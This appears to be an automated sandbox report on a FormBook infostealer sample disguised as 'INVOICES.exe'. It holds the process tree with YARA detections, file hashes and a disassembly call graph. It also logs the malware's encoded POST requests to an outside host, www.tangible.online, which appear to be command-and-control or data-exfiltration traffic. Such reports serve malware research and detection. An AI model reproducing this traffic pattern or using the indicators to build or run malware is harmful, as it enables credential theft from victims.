                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                 Timestamp: Oct 29, 2024 16:57:21.717084885 CET | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 29 Oct 2024 15:57:21 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 548
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                 Session ID: 53 | Source IP: 192.168.2.8 | Source Port: 49761 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp: Oct 29, 2024 16:57:27.001729012 CET | Bytes transferred: 687 | Direction: OUT | Data: POST /5byq/ HTTP/1.1
                                                                                                                                Host: www.tangible.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.tangible.online
                                                                                                                                Referer: http://www.tangible.online/5byq/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 49 4f 76 2b 69 33 62 30 32 6f 44 73 35 35 6d 32 53 58 36 56 2b 41 77 43 65 68 7a 4c 52 65 72 50 75 42 48 42 33 70 72 5a 53 34 34 65 71 59 35 4c 55 62 34 44 4f 42 4e 2f 62 71 4b 4d 46 55 53 38 65 6f 6e 38 47 4f 42 35 71 4b 35 45 39 59 51 4f 51 6c 2b 39 6b 42 49 54 6d 4c 6b 65 54 76 6f 36 35 6b 4a 48 4f 66 50 37 61 49 6d 73 78 30 39 5a 66 73 61 61 4d 75 4e 55 6c 7a 72 4f 71 4f 2b 32 49 78 4c 33 33 6b 46 79 61 75 44 52 6f 53 4b 2b 4c 74 33 73 44 46 36 4e 79 4d 4a 46 52 72 31 61 64 46 6f 75 4c 6c 68 42 6a 49 44 67 37 53 30 6f 38 2b 53 67 67 47 4b 59 6e 78 2f 37 59 57 41 56 32 39 48 50 41 2b 67 3d
                                                                                                                                Data Ascii: edD=IOv+i3b02oDs55m2SX6V+AwCehzLRerPuBHB3prZS44eqY5LUb4DOBN/bqKMFUS8eon8GOB5qK5E9YQOQl+9kBITmLkeTvo65kJHOfP7aImsx09ZfsaaMuNUlzrOqO+2IxL33kFyauDRoSK+Lt3sDF6NyMJFRr1adFouLlhBjIDg7S0o8+SggGKYnx/7YWAV29HPA+g=


                                                                                                                                 Session ID: 54 | Source IP: 192.168.2.8 | Source Port: 49762 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp: Oct 29, 2024 16:57:30.284787893 CET | Bytes transferred: 707 | Direction: OUT | Data: POST /5byq/ HTTP/1.1
                                                                                                                                Host: www.tangible.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.tangible.online
                                                                                                                                Referer: http://www.tangible.online/5byq/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 49 4f 76 2b 69 33 62 30 32 6f 44 73 37 61 2b 32 43 41 75 56 2f 67 77 64 62 68 7a 4c 49 4f 71 49 75 42 4c 42 33 71 6e 4a 4f 63 55 65 71 39 64 4c 56 61 34 44 4c 42 4e 2f 49 71 4b 4e 61 45 53 4e 65 6f 72 43 47 50 4e 35 71 4a 46 45 39 64 30 4f 51 55 2b 36 6b 52 49 56 72 72 6b 6d 4f 66 6f 36 35 6b 4a 48 4f 66 4b 67 61 4d 4b 73 78 6b 74 5a 65 4e 61 5a 46 4f 4e 58 78 6a 72 4f 35 65 2b 4d 49 78 4b 59 33 6c 4a 59 61 73 37 52 6f 54 36 2b 46 66 50 76 59 56 36 4c 2f 73 49 48 55 76 34 2b 66 6c 42 4d 4f 6a 4a 77 38 4b 44 48 36 6b 46 43 6d 63 61 6d 6a 47 69 7a 6e 79 58 4e 64 68 64 39 73 65 58 2f 65 70 31 54 34 2f 45 36 79 35 66 44 30 51 43 79 50 42 44 39 64 67 66 4c
                                                                                                                                Data Ascii: edD=IOv+i3b02oDs7a+2CAuV/gwdbhzLIOqIuBLB3qnJOcUeq9dLVa4DLBN/IqKNaESNeorCGPN5qJFE9d0OQU+6kRIVrrkmOfo65kJHOfKgaMKsxktZeNaZFONXxjrO5e+MIxKY3lJYas7RoT6+FfPvYV6L/sIHUv4+flBMOjJw8KDH6kFCmcamjGiznyXNdhd9seX/ep1T4/E6y5fD0QCyPBD9dgfL


                                                                                                                                 Session ID: 55 | Source IP: 192.168.2.8 | Source Port: 49763 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 5072 | Process: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                 Timestamp: Oct 29, 2024 16:57:33.479274035 CET | Bytes transferred: 1724 | Direction: OUT | Data: POST /5byq/ HTTP/1.1
                                                                                                                                Host: www.tangible.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.tangible.online
                                                                                                                                Referer: http://www.tangible.online/5byq/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 49 4f 76 2b 69 33 62 30 32 6f 44 73 37 61 2b 32 43 41 75 56 2f 67 77 64 62 68 7a 4c 49 4f 71 49 75 42 4c 42 33 71 6e 4a 4f 63 63 65 71 4c 52 4c 55 35 41 44 4d 42 4e 2f 54 4b 4b 49 61 45 53 51 65 72 61 46 47 50 52 32 71 50 4a 45 73 4c 6f 4f 57 6e 6d 36 75 52 49 56 33 62 6b 64 54 76 6f 6a 35 6e 78 39 4f 66 61 67 61 4d 4b 73 78 69 68 5a 58 38 61 5a 44 4f 4e 55 6c 7a 72 53 71 4f 2f 6a 49 78 54 76 33 6c 64 69 61 64 62 52 6f 7a 71 2b 49 4d 33 76 46 46 36 4a 36 73 49 6c 55 6f 77 68 66 6c 4d 39 4f 6e 42 57 38 49 54 48 32 52 6b 36 36 59 4c 6c 35 45 75 43 69 42 37 64 51 52 5a 51 68 59 4c 31 55 49 4e 6d 70 76 45 31 79 71 66 51 32 69 44 64 56 48 75 79 53 6c 53 2b 66 65 31 50 55 50 43 31 64 42 52 69 35 7a 62 33 62 44 65 67 74 42 66 67 4b 39 57 79 5a 57 32 33 6e 6c 6b 54 66 32 4b 55 4f 64 56 77 49 62 74 35 79 45 67 5a 53 2b 67 6a 4b 61 67 43 76 58 43 69 45 6c 6d 48 4c 62 51 66 6b 76 39 55 57 48 4a 35 6b 6d 76 64 70 39 54 4b 62 6e 42 6b 73 48 39 2f 68 7a 58 6f 56 72 6f 62 72 59 77 39 35 6d 58 69 4e 52 [TRUNCATED]
                                                                                                                                Data Ascii: edD=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 [TRUNCATED]


                                                                                                                                Target ID:0
                                                                                                                                Start time:11:53:23
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Users\user\Desktop\INVOICES.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\INVOICES.exe"
                                                                                                                                Imagebase:0x730000
                                                                                                                                File size:700'416 bytes
                                                                                                                                MD5 hash:90C8EF1083FBF63AE33F23D51513A611
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:2
                                                                                                                                Start time:11:53:24
                                                                                                                                Start date:29/10/2024
                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\INVOICES.exe"
                                                                                                                                Imagebase:0x5b0000
                                                                                                                                File size:46'504 bytes
                                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
Start time:11:53:41
Start date:29/10/2024
Path:C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe"
Imagebase:0xb50000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:high
Has exited:false

Target ID:5
Start time:11:53:43
Start date:29/10/2024
Path:C:\Windows\SysWOW64\AtBroker.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\AtBroker.exe"
Imagebase:0xf50000
File size:68'608 bytes
MD5 hash:D5B61959A509BDA85300781F5A829610
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:moderate
Has exited:false

Target ID:6
Start time:11:54:00
Start date:29/10/2024
Path:C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe"
Imagebase:0xb50000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:10
Start time:11:54:12
Start date:29/10/2024
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:0x7ff6d20e0000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:3.4%
Dynamic/Decrypted Code Coverage:1.7%
Signature Coverage:9.6%
Total number of Nodes:1977
Total number of Limit Nodes:155
98518->98520 98521 733944 98519->98521 98520->98511 98737 739040 98521->98737 98523 7393ea 59 API calls 98525 733961 98523->98525 98524 739040 60 API calls 98524->98525 98525->98523 98525->98524 98526 733ee2 59 API calls 98525->98526 98527 7339a7 Mailbox 98525->98527 98526->98525 98527->98397 98529 7373f2 __write_nolock 98528->98529 98530 73740b 98529->98530 98531 76ed7b _memset 98529->98531 99365 7348ae 98530->99365 98533 76ed97 762ED0D0 98531->98533 98535 76ede6 98533->98535 98537 737d2c 59 API calls 98535->98537 98539 76edfb 98537->98539 98539->98539 98541 737429 99393 7369ca 98541->99393 98545 740a9a __write_nolock 98544->98545 99637 736ee0 98545->99637 98547 740a9f 98548 733c26 98547->98548 99648 7412fe 89 API calls 98547->99648 98548->98407 98548->98415 98550 740aac 98550->98548 99649 744047 91 API calls Mailbox 98550->99649 98552 740ab5 98552->98548 98553 740ab9 GetFullPathNameW 98552->98553 98554 737d2c 59 API calls 98553->98554 98555 740ae5 98554->98555 98556 737d2c 59 API calls 98555->98556 98557 740af2 98556->98557 98558 775004 _wcscat 98557->98558 98559 737d2c 59 API calls 98557->98559 98559->98548 98561 733ac2 LoadImageW RegisterClassExW 98560->98561 98562 76d3cc 98560->98562 99652 733041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 98561->99652 99656 7348fe LoadImageW EnumResourceNamesW 98562->99656 98566 76d3d5 98567 7339e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98567->98423 98569 77501c 98568->98569 98581 740b55 98568->98581 99712 799ed4 89 API calls 4 library calls 98569->99712 98571 740e5a 98571->98430 98573 741044 98573->98571 98575 741051 98573->98575 99710 7411f3 341 API calls Mailbox 98575->99710 98576 740bab PeekMessageW 98643 740b65 Mailbox 98576->98643 98579 741058 LockWindowUpdate DestroyWindow GetMessageW 98579->98571 98583 74108a 98579->98583 98580 740e44 98580->98571 99709 7411d0 10 API calls Mailbox 98580->99709 98581->98643 99713 739fbd 60 API calls 98581->99713 99714 78669f 341 API calls 98581->99714 
98582 7751da Sleep 98582->98643 98585 775fb1 TranslateMessage DispatchMessageW GetMessageW 98583->98585 98585->98585 98586 775fe1 98585->98586 98586->98571 98587 739fbd 60 API calls 98587->98643 98588 741005 TranslateMessage DispatchMessageW 98589 740fa3 PeekMessageW 98588->98589 98589->98643 98590 7750a9 TranslateAcceleratorW 98590->98589 98590->98643 98591 740e73 timeGetTime 98591->98643 98592 775b78 WaitForSingleObject 98597 775b95 GetExitCodeProcess CloseHandle 98592->98597 98592->98643 98594 740fbf Sleep 98626 740fd0 Mailbox 98594->98626 98595 7381a7 59 API calls 98595->98643 98596 7377c7 59 API calls 98596->98626 98627 7410f5 98597->98627 98598 750f36 59 API calls Mailbox 98598->98643 98599 775e51 Sleep 98599->98626 98601 75034a timeGetTime 98601->98626 98603 7410ae timeGetTime 99711 739fbd 60 API calls 98603->99711 98606 775ee8 GetExitCodeProcess 98611 775f14 CloseHandle 98606->98611 98612 775efe WaitForSingleObject 98606->98612 98607 739997 84 API calls 98607->98643 98609 7b5f8e 110 API calls 98609->98626 98610 73b93d 109 API calls 98610->98626 98611->98626 98612->98611 98612->98643 98614 775bcd 98614->98627 98615 775f70 Sleep 98615->98643 98616 7753d1 Sleep 98616->98643 98619 737f41 59 API calls 98619->98626 98626->98596 98626->98601 98626->98606 98626->98609 98626->98610 98626->98614 98626->98615 98626->98616 98626->98619 98626->98627 98626->98643 99721 792700 60 API calls 98626->99721 99722 739fbd 60 API calls 98626->99722 99723 738b13 69 API calls Mailbox 98626->99723 99724 73b89c 341 API calls 98626->99724 99725 786830 60 API calls 98626->99725 99726 7952eb QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98626->99726 99727 793c99 66 API calls Mailbox 98626->99727 98627->98430 98630 799ed4 89 API calls 98630->98643 98631 739df0 59 API calls Mailbox 98631->98643 98632 73a000 314 API calls 98632->98643 98633 738620 69 API calls 98633->98643 98635 7863f2 59 API calls Mailbox 98635->98643 98636 77592e VariantClear 
98636->98643 98637 7759c4 VariantClear 98637->98643 98638 775772 VariantClear 98638->98643 98639 738e34 59 API calls Mailbox 98639->98643 98640 7871e5 59 API calls 98640->98643 98641 737f41 59 API calls 98641->98643 98642 738b13 69 API calls 98642->98643 98643->98576 98643->98580 98643->98582 98643->98587 98643->98588 98643->98589 98643->98590 98643->98591 98643->98592 98643->98594 98643->98595 98643->98598 98643->98599 98643->98603 98643->98607 98643->98626 98643->98627 98643->98630 98643->98631 98643->98632 98643->98633 98643->98635 98643->98636 98643->98637 98643->98638 98643->98639 98643->98640 98643->98641 98643->98642 98644 73b89c 314 API calls 98643->98644 99657 73e800 98643->99657 99688 73f5c0 98643->99688 99706 73e580 341 API calls 98643->99706 99707 73fe40 341 API calls 2 library calls 98643->99707 99708 7331ce IsDialogMessageW GetClassLongW 98643->99708 99715 7b6081 59 API calls 98643->99715 99716 799abe 59 API calls Mailbox 98643->99716 99717 78d801 59 API calls 98643->99717 99718 786363 59 API calls 2 library calls 98643->99718 99719 738561 59 API calls 98643->99719 99720 73843f 59 API calls Mailbox 98643->99720 98644->98643 98645->98425 98646->98400 98647->98407 98648->98420 98650 761ac0 __write_nolock 98649->98650 98651 734871 GetModuleFileNameW 98650->98651 98652 737f41 59 API calls 98651->98652 98653 734897 98652->98653 98654 7348ae 60 API calls 98653->98654 98655 7348a1 Mailbox 98654->98655 98655->98426 98657 76f0a3 98656->98657 98658 737e1f 98656->98658 100014 738189 59 API calls Mailbox 98657->100014 100009 737db0 98658->100009 98661 737e2a 98663 737c8e 98661->98663 98662 76f0ae __NMSG_WRITE _memmove 98664 76efc4 98663->98664 98665 737ca0 98663->98665 100022 787f03 59 API calls _memmove 98664->100022 100016 737bb1 98665->100016 98668 737cac 98668->98443 98669 76efce 98670 7381a7 59 API calls 98669->98670 98671 76efd6 Mailbox 98670->98671 98673 733d50 __write_nolock 98672->98673 98674 737d2c 59 API calls 98673->98674 98679 733eb6 Mailbox 
98673->98679 98676 733d82 98674->98676 98684 733db8 Mailbox 98676->98684 98787 737b52 98676->98787 98677 733e89 98678 737f41 59 API calls 98677->98678 98677->98679 98681 733eaa 98678->98681 98679->98451 98680 737f41 59 API calls 98680->98684 98682 733f84 59 API calls 98681->98682 98682->98679 98684->98677 98684->98679 98684->98680 98685 737b52 59 API calls 98684->98685 98790 733f84 98684->98790 98685->98684 98796 734d13 98686->98796 98691 76dc3f 98694 734faa 84 API calls 98691->98694 98692 734f68 LoadLibraryExW 98806 734cc8 98692->98806 98696 76dc46 98694->98696 98697 734cc8 3 API calls 98696->98697 98699 76dc4e 98697->98699 98832 73506b 98699->98832 98700 734f8f 98700->98699 98701 734f9b 98700->98701 98703 734faa 84 API calls 98701->98703 98705 7337e6 98703->98705 98705->98458 98705->98460 98707 76dc75 98840 735027 98707->98840 98709 76dc82 98711 7381b2 98710->98711 98712 733801 98710->98712 99094 7380d7 59 API calls 2 library calls 98711->99094 98714 7393ea 98712->98714 98715 750f36 Mailbox 59 API calls 98714->98715 98716 73380d 98715->98716 98716->98472 98718 73862b 98717->98718 98720 738652 98718->98720 99095 738b13 69 API calls Mailbox 98718->99095 98720->98476 98722 733f05 98721->98722 98723 733eec 98721->98723 98725 737d2c 59 API calls 98722->98725 98724 7381a7 59 API calls 98723->98724 98726 73388b 98724->98726 98725->98726 98727 75307d 98726->98727 98728 7530fe 98727->98728 98729 753089 98727->98729 99098 753110 60 API calls 4 library calls 98728->99098 98736 7530ae 98729->98736 99096 758ca8 58 API calls __getptd_noexit 98729->99096 98732 75310b 98732->98497 98733 753095 99097 758f36 9 API calls __write_nolock 98733->99097 98735 7530a0 98735->98497 98736->98497 98738 76f4d5 98737->98738 98741 739057 98737->98741 98738->98741 99100 738d3b 59 API calls Mailbox 98738->99100 98740 73915f 98740->98525 98741->98740 98742 7391a0 98741->98742 98743 739158 98741->98743 99099 739e9c 60 API calls Mailbox 98742->99099 98744 750f36 Mailbox 59 API calls 98743->98744 
98744->98740 98747 735045 85 API calls 98746->98747 98748 799673 98747->98748 99101 7997dd 98748->99101 98751 73506b 74 API calls 98752 7996a0 98751->98752 98753 73506b 74 API calls 98752->98753 98754 7996b0 98753->98754 98755 73506b 74 API calls 98754->98755 98756 7996cb 98755->98756 98757 73506b 74 API calls 98756->98757 98758 7996e6 98757->98758 98759 735045 85 API calls 98758->98759 98760 7996fd 98759->98760 98761 75588c __crtLCMapStringA_stat 58 API calls 98760->98761 98762 799704 98761->98762 98763 75588c __crtLCMapStringA_stat 58 API calls 98762->98763 98764 79970e 98763->98764 98765 73506b 74 API calls 98764->98765 98766 799722 98765->98766 98767 7991b2 GetSystemTimeAsFileTime 98766->98767 98768 799735 98767->98768 98769 79974a 98768->98769 98770 79975f 98768->98770 98771 752ed5 _free 58 API calls 98769->98771 98772 799765 98770->98772 98773 7997c4 98770->98773 98774 799750 98771->98774 99107 798baf 116 API calls __fcloseall 98772->99107 98776 752ed5 _free 58 API calls 98773->98776 98777 752ed5 _free 58 API calls 98774->98777 98779 76d2f1 98776->98779 98777->98779 98778 7997bc 98780 752ed5 _free 58 API calls 98778->98780 98779->98463 98781 734faa 98779->98781 98780->98779 98782 734fb4 98781->98782 98783 734fbb 98781->98783 99108 755516 98782->99108 98785 734fdb FreeLibrary 98783->98785 98786 734fca 98783->98786 98785->98786 98786->98463 98788 737faf 59 API calls 98787->98788 98789 737b5d 98788->98789 98789->98676 98791 733f92 98790->98791 98795 733fb4 _memmove 98790->98795 98793 750f36 Mailbox 59 API calls 98791->98793 98792 750f36 Mailbox 59 API calls 98794 733fc8 98792->98794 98793->98795 98794->98684 98795->98792 98845 734d61 98796->98845 98799 734d3a 98800 734d53 98799->98800 98801 734d4a FreeLibrary 98799->98801 98803 7553cb 98800->98803 98801->98800 98802 734d61 2 API calls 98802->98799 98849 7553e0 98803->98849 98805 734f5c 98805->98691 98805->98692 99009 734d94 98806->99009 98809 734ced 98810 734d08 98809->98810 98811 734cff FreeLibrary 98809->98811 
98813 734dd0 98810->98813 98811->98810 98812 734d94 2 API calls 98812->98809 98814 750f36 Mailbox 59 API calls 98813->98814 98815 734de5 98814->98815 99013 73538e 98815->99013 98817 734df1 _memmove 98818 734e2c 98817->98818 98819 734f21 98817->98819 98820 734ee9 98817->98820 98821 735027 69 API calls 98818->98821 99027 7999c4 95 API calls 98819->99027 99016 734fe9 CreateStreamOnHGlobal 98820->99016 98829 734e35 98821->98829 98824 73506b 74 API calls 98824->98829 98825 734ec9 98825->98700 98827 76dc00 98828 735045 85 API calls 98827->98828 98830 76dc14 98828->98830 98829->98824 98829->98825 98829->98827 99022 735045 98829->99022 98831 73506b 74 API calls 98830->98831 98831->98825 98833 73507d 98832->98833 98836 76dd26 98832->98836 99051 755752 98833->99051 98837 7991b2 99071 799008 98837->99071 98839 7991c8 98839->98707 98841 735036 98840->98841 98842 76dce9 98840->98842 99076 755dd0 98841->99076 98844 73503e 98844->98709 98846 734d2e 98845->98846 98847 734d6a LoadLibraryA 98845->98847 98846->98799 98846->98802 98847->98846 98848 734d7b GetProcAddress 98847->98848 98848->98846 98851 7553ec __initptd 98849->98851 98850 7553ff 98898 758ca8 58 API calls __getptd_noexit 98850->98898 98851->98850 98853 755430 98851->98853 98868 760668 98853->98868 98854 755404 98899 758f36 9 API calls __write_nolock 98854->98899 98857 755435 98858 75543e 98857->98858 98859 75544b 98857->98859 98900 758ca8 58 API calls __getptd_noexit 98858->98900 98861 755475 98859->98861 98862 755455 98859->98862 98883 760787 98861->98883 98901 758ca8 58 API calls __getptd_noexit 98862->98901 98867 75540f __initptd @_EH4_CallFilterFunc@8 98867->98805 98869 760674 __initptd 98868->98869 98870 759d8b __lock 58 API calls 98869->98870 98871 760682 98870->98871 98872 7606fd 98871->98872 98877 759e13 __mtinitlocknum 58 API calls 98871->98877 98881 7606f6 98871->98881 98906 756dcd 59 API calls __lock 98871->98906 98907 756e37 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 98871->98907 98908 75899d 58 
API calls 2 library calls 98872->98908 98875 760704 98875->98881 98909 759fab InitializeCriticalSectionAndSpinCount 98875->98909 98877->98871 98879 760773 __initptd 98879->98857 98880 76072a RtlEnterCriticalSection 98880->98881 98903 76077e 98881->98903 98892 7607a7 __wopenfile 98883->98892 98884 7607c1 98914 758ca8 58 API calls __getptd_noexit 98884->98914 98886 76097c 98886->98884 98890 7609df 98886->98890 98887 7607c6 98915 758f36 9 API calls __write_nolock 98887->98915 98889 755480 98902 7554a2 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 98889->98902 98911 768721 98890->98911 98892->98884 98892->98886 98892->98892 98916 75394b 60 API calls 3 library calls 98892->98916 98894 760975 98894->98886 98917 75394b 60 API calls 3 library calls 98894->98917 98896 760994 98896->98886 98918 75394b 60 API calls 3 library calls 98896->98918 98898->98854 98899->98867 98900->98867 98901->98867 98902->98867 98910 759ef5 RtlLeaveCriticalSection 98903->98910 98905 760785 98905->98879 98906->98871 98907->98871 98908->98875 98909->98880 98910->98905 98919 767f05 98911->98919 98913 76873a 98913->98889 98914->98887 98915->98889 98916->98894 98917->98896 98918->98886 98920 767f11 __initptd 98919->98920 98921 767f27 98920->98921 98924 767f5d 98920->98924 99006 758ca8 58 API calls __getptd_noexit 98921->99006 98923 767f2c 99007 758f36 9 API calls __write_nolock 98923->99007 98930 767fce 98924->98930 98927 767f79 99008 767fa2 RtlLeaveCriticalSection __unlock_fhandle 98927->99008 98929 767f36 __initptd 98929->98913 98931 767fee 98930->98931 98932 75465a __wsopen_nolock 58 API calls 98931->98932 98935 76800a 98932->98935 98933 758f46 __invoke_watson 8 API calls 98934 768720 98933->98934 98937 767f05 __wsopen_helper 103 API calls 98934->98937 98936 768044 98935->98936 98944 768067 98935->98944 98978 768141 98935->98978 98938 758c74 __write_nolock 58 API calls 98936->98938 98939 76873a 98937->98939 98940 768049 98938->98940 98939->98927 98941 758ca8 __fseek_nolock 58 API calls 
